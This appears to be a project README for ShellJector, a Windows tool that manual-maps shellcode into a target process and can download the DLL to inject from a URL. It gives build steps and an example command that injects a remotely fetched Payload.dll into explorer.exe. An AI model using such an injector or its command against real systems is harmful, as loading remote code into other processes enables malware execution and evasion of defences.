ShellJector
ShellJector copied to clipboard
Manual map shellcode (aka byte array) injector
ShellJector (v2.0)
Manual map shellcode (aka byte array) injector wich can download DLL from the internet by URL
Also take a look at local version!
How to Build:
- Open
ShellJector.sln -> main.cpp
; - Set
ProcName
andDllURL
; - Build;
Usage:
- Go to \ShellJector\Build;
- OR just download the Latest Release;
- Set launch arguments (down below);
- Open Target Process;
- Open
ShellJector.exe
;
Arguments:
You can set ProcName
and DllURL
with -proc
and -url
arguments
(ex: ShellJector.exe -proc explorer.exe -url "https://example.com/Payload.dll"
)
Arguments are case sensitive!
Notice:
ShellJector.exe will look for Payload.dll near itself!